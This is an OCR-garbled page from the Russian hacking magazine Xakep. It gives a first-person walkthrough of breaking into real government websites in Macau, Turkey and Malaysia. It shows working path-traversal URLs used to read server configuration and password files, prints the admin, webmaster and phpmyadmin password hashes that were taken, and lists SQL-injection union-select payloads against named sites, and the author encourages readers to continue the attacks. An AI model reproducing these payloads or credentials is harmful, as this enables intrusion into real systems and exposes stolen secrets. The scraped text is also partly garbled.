Ãœðù - Xakep Online
Ãœðù - Xakep Online
Ãœðù - Xakep Online
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
взлом<br />
Дырявое казначейство Малайзии :)<br />
Читаем файлы на сервере сиднейского руководства<br />
Ответ не заставил себя долго ждать:<br />
# Do not remove the following line,<br />
or various programs # that require<br />
network functionality will fail.<br />
127.0.0.1 gp.macau.grandprix.<br />
gov.mo localhost localhost.<br />
localdomain gp www.macau.<br />
grandprix.gov.mo #192.168.1.28<br />
www.macau.grandprix.gov.mo<br />
Как оказалось, на сервере крутился Linux:<br />
Linux version 2.6.17-1.2142_<br />
FC4smp (bhcompile@hs20‐bc1-<br />
4.build.redhat.com) (gcc version<br />
4.0.2 20051125 (Red Hat 4.0.2-8))<br />
#1 SMP Tue Jul 11 22:57:02 EDT 2006<br />
И через минуту у меня в руках уже находился<br />
конфиг Апача:<br />
http://www.macau.grandprix.<br />
gov.mo/mgpc/public_html<br />
/gb/main.php?cat=news&item=mg<br />
pc&file=../../../../../../..<br />
/../etc/httpd/conf/httpd.conf<br />
Виртуальных хостов на сервере найдено не<br />
было, зато я обнаружил полезную для себя диру:<br />
/export/home/httpuser/WebMaster/. Поиграв<br />
с параметрами, я таки выудил хэши пассов<br />
админов:<br />
http://www.macau.grandprix.gov.<br />
mo/mgpc/public_html/gb/main.<br />
php?cat=news&item=mgpc&file=..<br />
/../../../../../../../export/<br />
home/httpuser/WebMaster/.<br />
gppassword&id=394<br />
Самое интересное, что тут был не один хэш:<br />
WebMaster:fk0EbenCGRXs2<br />
phpmyadmin:d3jB0p9PyULGc admin:/<br />
NLkH.tT7RC1c<br />
Вот тебе и админ, и веб-мастер и пхпмайадмин<br />
=). Паролики, естественно, были расшифрованы,<br />
но выкладывать я их не буду :).<br />
Все в твоих руках. Кстати, админка лежит<br />
тут: www.macau.grandprix.gov.mo/admin.<br />
Продолжаем двигаться дальше. Следующие<br />
на очереди — турки.<br />
Честно говоря, мне никогда не нравился<br />
турецкий андеграунд с обилием кидисов.<br />
Поэтому от вида турецкого ресурса, находящегося<br />
в правительственной доменной зоне,<br />
во мне сразу проснулся азарт =). Сам линк на<br />
сайт был таким: www.atam.gov.tr. Побродив по<br />
ссылкам, я наткнулся на инъекцию:<br />
http://www.atam.gov.tr/index.php?<br />
Page=DergiIcerik&IcerikNo=-1%27<br />
Скрипт index.php работал с базой и был подвержен<br />
sql-инъекции, что не могло не радовать :).<br />
Поиграв с конструкцией «order by», я таки<br />
узнал количество полей:<br />
http://www.atam.gov.tr/index.<br />
php?Page=DergiIcerik&IcerikNo=-<br />
1+order+by+5/*<br />
Как выяснилось, данные со второго и пятого<br />
полей отображались:<br />
http://www.atam.gov.tr/index.<br />
php?Page=DergiIcerik&IcerikNo=-<br />
1+union+select+1,2,3,4,5/*<br />
К сожалению, на мою попытку получить доступ<br />
к mysql.users база ругнулась и выдала лишь:<br />
«Access denied for user: 'atamDB@localhost' to<br />
database 'mysql'». Название одной таблички<br />
я знал: DergiIcerik. Также я знал и названия<br />
полей в ней: No, TRBaslik, TRYazar, TRDergiSayi,<br />
TRIcerik. Но ничего полезного там не обнаружилось.<br />
Прав file_priv тоже не было, и все попытки<br />
прочитать какой-либо из файлов на сервере<br />
были тщетны. Но когда я глянул версию MySQL,<br />
мое лицо расплылось в улыбке:<br />
http://www.atam.gov.tr/index.<br />
php?Page=DergiIcerik&IcerikNo=-<br />
1+union+select+1,version(),3,4,<br />
5+from+DergiIcerik/*<br />
На сервере крутился «мускул» версии 4.0.26. Как<br />
и с чем его едят, думаю, разберешься и без меня<br />
— я и так тебе уже многое сказал =).<br />
Так, кто там на очереди? Ах, Малайзия, а я<br />
уж и забыл :). Между прочем, не сайтец, а<br />
золото, почти в прямом смысле. Спешу представить<br />
тебе официальный ресурс казначейства<br />
Министерства финансов Малайзии:<br />
www.treasury.gov.my. Кстати, дизайн у этого<br />
портала достаточно качественный, чего<br />
не скажешь о движке. Достаточно прогуляться<br />
по следующему линку, чтобы в этом<br />
убедиться:<br />
http://www.treasury.gov.my/<br />
index.php?ch=36&pg=126&ac=1830<br />
%27<br />
«Так, кто там на очереди? Ах, Малайзия, а я уж и<br />
забыл :). Между прочим, не сайтец, а золото, почти<br />
в прямом смысле»<br />
/ 076<br />
xàêåð 05 /101/ 07